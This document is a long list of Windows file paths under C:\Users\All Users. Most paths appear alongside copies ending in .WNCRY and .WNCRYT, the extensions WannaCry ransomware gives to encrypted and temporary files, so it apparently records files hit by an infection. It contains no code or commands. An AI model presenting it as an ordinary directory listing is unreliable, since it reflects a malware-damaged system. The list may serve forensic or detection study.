C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRY
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRY
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRY
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
